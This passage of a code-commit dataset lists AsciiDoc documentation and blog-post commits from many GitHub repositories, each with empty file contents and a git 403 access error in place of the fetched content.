403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ae21e5985632e8edaeb7ef604d07c72795fdd0d","subject":"Update 2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","message":"Update 2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","new_file":"_posts\/2018-01-17-Neo4j-Causal-Cluster-Docker-Quickstart-Open-Source-Version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4afcf5fbd51b13a23935bc2aadcbbc7c5ad8d2a","subject":"Added 3.2.1.Final news","message":"Added 3.2.1.Final news\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-06-02-forge-3.2.1.final.asciidoc","new_file":"news\/2016-06-02-forge-3.2.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5236b89a858576e1e938f618618d53753b7fdb20","subject":"Update 2015-11-08-Ihr-seid-gefragt.adoc","message":"Update 2015-11-08-Ihr-seid-gefragt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_file":"_posts\/2015-11-08-Ihr-seid-gefragt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"802539d5969b4a62223aa3ab07972057351cb8fc","subject":"Blog post announcing project lead change","message":"Blog post announcing project lead change\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2017-04-26-Debezium-evolving.adoc","new_file":"blog\/2017-04-26-Debezium-evolving.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4eff82053e69ff6b1471f2c228b55a02ddf94d02","subject":"Update technical-manual.adoc","message":"Update technical-manual.adoc","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"4ec7ee23c3e4771e637248b282305bcc1e02eac6","subject":"Python note - Generating SSH key pairs","message":"Python note - Generating SSH key pairs\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"0c6ba20fcf2de50b4d2c837d5ead66bfa9bec5b5","subject":"Updated README","message":"Updated README\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f91a92ba580988bf84ebebe78aca75abf82360e7","subject":"Import release notes for Groovy 2.0","message":"Import release notes for Groovy 2.0\n","repos":"benignbala\/groovy-website,rahulsom\/sdkman-website,groovy\/groovy-website,dmesu\/sdkman-website,rahulsom\/sdkman-website,marcoVermeulen\/groovy-website,benignbala\/groovy-website,marc0der\/groovy-website,kevintanhongann\/groovy-website,groovy\/groovy-website,sdkman\/sdkman-website,m-ullrich\/groovy-website,dmesu\/sdkman-website,webkaz\/groovy-website,PascalSchumacher\/groovy-website,kevintanhongann\/groovy-website,marcoVermeulen\/groovy-website,webkaz\/groovy-website,marc0der\/groovy-website,sdkman\/sdkman-website","old_file":"site\/src\/site\/releasenotes\/groovy-2.0.adoc","new_file":"site\/src\/site\/releasenotes\/groovy-2.0.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rahulsom\/sdkman-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51f9ff8e78802787ce91fd3d24d928d77bb206eb","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df9794b11e5d90b7374a13cd35a12cb2b5a8eedb","subject":"Create BasicInfo.adoc","message":"Create BasicInfo.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/BasicInfo.adoc","new_file":"wiki\/tutorials\/BasicInfo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0490b34dddfb1ca4dcb9255c5fc94b5cc4cfb2e","subject":"[docs] An instruction to add repaired disk back to cluster","message":"[docs] An instruction to add repaired disk back to cluster\n\nChange-Id: I4d268f62455a22899f3bf38a4bf4ad64db048457\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12329\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Kudu Jenkins\n","repos":"helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d684696ecf4a8f28126ec5b994a3d3e2afe8563","subject":"add infinispan doc","message":"add infinispan doc\n","repos":"jbosschina\/cluster,jbosschina\/cluster,jbosschina\/cluster","old_file":"docs\/infinispan.asciidoc","new_file":"docs\/infinispan.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/cluster.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fe0737bc8c6f86a515441479460985275b0a987","subject":"NMS-6634: Documentation DnsMonitor","message":"NMS-6634: Documentation DnsMonitor\n\n- Created complete parameter description\n- Created example testing DNS lookup for A record against www.google.com\n","repos":"rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DnsMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DnsMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"b4153ddc0a3b9ec04dac03d10671d5da277a58c1","subject":"Bug Hibernate","message":"Bug Hibernate\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Best practices\/JPA.adoc","new_file":"Best practices\/JPA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdfb32ae0c668ba532f762b83c8f674b47992b6b","subject":"Renamed '_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc' to '_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc'","message":"Renamed '_posts\/2017-11-10-Neo4j-Enterprise-330-is-out-but-you-may-have-noticed-that-while-still-open-source-you-are-going-to-have-a-harder-time-getting-the-enterprise-package-with-its-free-open-source-license.adoc' to '_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc'","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc","new_file":"_posts\/2017-11-14-Neo4j-330-is-out-but-where-are-the-open-source-enterprise-binaries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4449877aeff9a7d504b447644b5607d18afff9fd","subject":"y2b create post The Best Wireless Headphones You Can Buy Right Now","message":"y2b create post The Best Wireless Headphones You Can Buy Right Now","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-02-The%20Best%20Wireless%20Headphones%20You%20Can%20Buy%20Right%20Now.adoc","new_file":"_posts\/2018-02-02-The%20Best%20Wireless%20Headphones%20You%20Can%20Buy%20Right%20Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"493e46d4cbe5e9d483ce4a9f834bad560da9a65a","subject":"y2b create post Eton Mobius for iPhone GIVEAWAY!","message":"y2b create post Eton Mobius for iPhone GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-28-Eton-Mobius-for-iPhone-GIVEAWAY.adoc","new_file":"_posts\/2011-11-28-Eton-Mobius-for-iPhone-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7369d3fd566dd52a2dfdcfb3a86ccece04fde150","subject":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","message":"Update 2015-04-15-Quest-ce-que-lAPM.adoc","repos":"yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io,yoanndupuy\/yoanndupuy.github.io","old_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_file":"_posts\/2015-04-15-Quest-ce-que-lAPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yoanndupuy\/yoanndupuy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a01b5589a91be94f37b6c7acb656cf2058489e7e","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f91813bb9a89a8c6baf80ce5e3c547dfc90d325","subject":"Deleted 2016-09-innovation-Engineer-Aruaru.adoc","message":"Deleted 2016-09-innovation-Engineer-Aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_file":"2016-09-innovation-Engineer-Aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7e8b48847de2f273d546c50d0e2e5b2c7fedfc","subject":"Update 2017-10-28-Your-Blog-title2.adoc","message":"Update 2017-10-28-Your-Blog-title2.adoc","repos":"Jason2013\/hubpress,Jason2013\/hubpress,Jason2013\/hubpress,Jason2013\/hubpress","old_file":"_posts\/2017-10-28-Your-Blog-title2.adoc","new_file":"_posts\/2017-10-28-Your-Blog-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jason2013\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50e7979e7cdf792aadad6c271357371bc9e35378","subject":"add a more detailed spec on the search itf","message":"add a more detailed spec on the search itf\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"docs\/search_spec.adoc","new_file":"docs\/search_spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3d7caf419b7e9539549b96ebd1dc6baa3d89c00","subject":"Update 2014-12-29-A-resume-and-a-code-example-in-one.adoc","message":"Update 2014-12-29-A-resume-and-a-code-example-in-one.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-12-29-A-resume-and-a-code-example-in-one.adoc","new_file":"_posts\/2014-12-29-A-resume-and-a-code-example-in-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47787c037b2dad23cb760fedd04157477965485c","subject":"Update 2015-10-01-Story-of-my-Life.adoc","message":"Update 2015-10-01-Story-of-my-Life.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Story-of-my-Life.adoc","new_file":"_posts\/2015-10-01-Story-of-my-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5a0b36b79475fc3e0a768f2453539bccc5cf9e2","subject":"updated required repos for OCP3.4 and OSP10","message":"updated required repos for OCP3.4 and OSP10\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"315415c36561c019cfcfb06f3cb8ba388bbd4cee","subject":"Create README.adoc","message":"Create README.adoc","repos":"arturmon\/mycontroller,Dietmar-Franken\/mycontroller,Thar0l\/mycontroller,mycontroller-org\/mycontroller,arturmon\/mycontroller,Thar0l\/mycontroller,Thar0l\/mycontroller,Dietmar-Franken\/mycontroller,arturmon\/mycontroller,Thar0l\/mycontroller,arturmon\/mycontroller,Dietmar-Franken\/mycontroller,Dietmar-Franken\/mycontroller,pgh70\/mycontroller","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arturmon\/mycontroller.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d377de2ac507a65b726c6d1ec9519b33fdb7a47e","subject":"update content","message":"update content\n","repos":"cinhtau\/kaffee-pelion","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cinhtau\/kaffee-pelion.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2298ab6a7e95cb8e8772fdcbdb5cbe8c4c70c18c","subject":"Rename my_openshift to my-openshift","message":"Rename my_openshift to my-openshift\n\nInstance hostnames are prefixed with stack name. If this stack name\ncontains '_' kubernetes fails.\n\nFixes #58\n","repos":"markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,markllama\/openshift-on-openstack,BBVA\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redhat-openstack\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c9cad6a36fda43b669fed0c853f9c5d31fd81a85","subject":"new readme","message":"new readme\n","repos":"belaban\/jgroups-docker,belaban\/jgroups-docker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/belaban\/jgroups-docker.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"93641a7c98b44034c129fd1d893d8a9474faa6d7","subject":"Update README","message":"Update README\n","repos":"pjanouch\/termo","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/termo.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbbde18a462b7c4aa4627c51f5353d4e64296afa","subject":"add badges","message":"add badges\n","repos":"ollin\/wstageorg,ollin\/wstageorg,ollin\/wstageorg","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ollin\/wstageorg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"ee61274d83c2bcdfc97a5d274a332478b8309940","subject":"doc: add read file","message":"doc: add read file\n","repos":"Kronos-Integration\/kronos-interceptor-object-data-processor-chunk","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kronos-Integration\/kronos-interceptor-object-data-processor-chunk.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"e0c0f5a9856012ed739a8100d0981dfa960e7ca4","subject":"Update 2015-07-01-Hybris-Logging-Level.adoc","message":"Update 2015-07-01-Hybris-Logging-Level.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybris-Logging-Level.adoc","new_file":"_posts\/2015-07-01-Hybris-Logging-Level.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"097d8a718087b0b526463a6fccd470feac912de7","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cd346ceeee7270b9c408f7aef86d8ea74546a85","subject":"Update 2018-09-08-Go.adoc","message":"Update 2018-09-08-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-08-Go.adoc","new_file":"_posts\/2018-09-08-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"309310563231b552607587e9dd35285a8dd1ed79","subject":"Added release notes","message":"Added release notes\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"RELEASE-NOTES.adoc","new_file":"RELEASE-NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c3b739e750c7a8b388736be66a9d29a86d8bb87b","subject":"Update 2015-10-27-demo.adoc","message":"Update 2015-10-27-demo.adoc","repos":"e-scape\/blog,e-scape\/blog,e-scape\/blog","old_file":"_posts\/2015-10-27-demo.adoc","new_file":"_posts\/2015-10-27-demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/e-scape\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdafd1b82b2cac9bbf8d8d76922ee4817aee10bb","subject":"Added ___How_to_document_pm4j___.adoc","message":"Added ___How_to_document_pm4j___.adoc\n","repos":"pm4j\/org.pm4j,pm4j\/org.pm4j","old_file":"pm4j-doc\/___How_to_document_pm4j___.adoc","new_file":"pm4j-doc\/___How_to_document_pm4j___.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pm4j\/org.pm4j.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"184187172e87f7d6cd7d24908c27505e0964f7ae","subject":"turn the live reload plugin prior to editing the codes in devtools","message":"turn the live reload plugin prior to editing the codes in devtools\n","repos":"mygithubwork\/boot-works,verydapeng\/boot-works,mygithubwork\/boot-works,verydapeng\/boot-works","old_file":"devtools.adoc","new_file":"devtools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mygithubwork\/boot-works.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2b41fd04fee0dcc10e6f48f7cc0bdd6dc4f2df8","subject":"Update 2016-7-19-and.adoc","message":"Update 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-19-and.adoc","new_file":"_posts\/2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20a1fcf4b2cf23200602d89ceb097690594992ba","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60e7272429c4db6de4b098a8c9250994300ec63e","subject":"added erts description to docs","message":"added erts description to docs\n\nSigned-off-by: Jordan Wilberding <c75c9afa7ab32355502e631bdcd27e5db15b49c6@gmail.com>\n","repos":"ericbmerritt\/sinan,erlware-deprecated\/sinan,erlware-deprecated\/sinan,ericbmerritt\/sinan,ericbmerritt\/sinan,erlware-deprecated\/sinan","old_file":"doc\/ERTS.adoc","new_file":"doc\/ERTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erlware-deprecated\/sinan.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a6cc162e4b783f7f57faf99d9905dc5fe604413","subject":"update docs based on recent tickets that have been completed","message":"update docs based on recent tickets that have been completed\n","repos":"jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7affa9d8dd7c8280aade868e311454f23fe3beab","subject":"Some spelling and grammar fixes","message":"Some spelling and grammar fixes\n\nSigned-off-by: Christian Romney <78cb0763aa1664e7dd86fd558ae466f67ab17826@pointslope.com>\n","repos":"tcsavage\/cats,alesguzik\/cats,mccraigmccraig\/cats,yurrriq\/cats,OlegTheCat\/cats,funcool\/cats","old_file":"doc\/cats.adoc","new_file":"doc\/cats.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"68a192e20d6aac74c39c0598c80b76f7916fc9d9","subject":"Create readme.adoc","message":"Create readme.adoc","repos":"giuan\/m-opal-client,giuan\/m-opal-jquery,giuan\/m-opal-jquery,giuan\/m-opal-client,giuan\/m-opal-client,giuan\/m-opal-jquery","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/giuan\/m-opal-client.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b9ffad531e005160fbafa21a55e8a1717f6f029","subject":"Added readme.","message":"Added readme.","repos":"thomasdarimont\/whats-new-in-spring-data,springone2gx2015\/whats-new-in-spring-data,springone2gx2015\/whats-new-in-spring-data,thomasdarimont\/whats-new-in-spring-data","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/springone2gx2015\/whats-new-in-spring-data.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4ec179b2ba91a4546fdf2c5bae0d21716ddd6312","subject":"Update \"_doc\" to \"account\" type for bulk example (#28786)","message":"Update \"_doc\" to \"account\" type for bulk example (#28786)\n\n* Change 'account' to '_doc' as types are 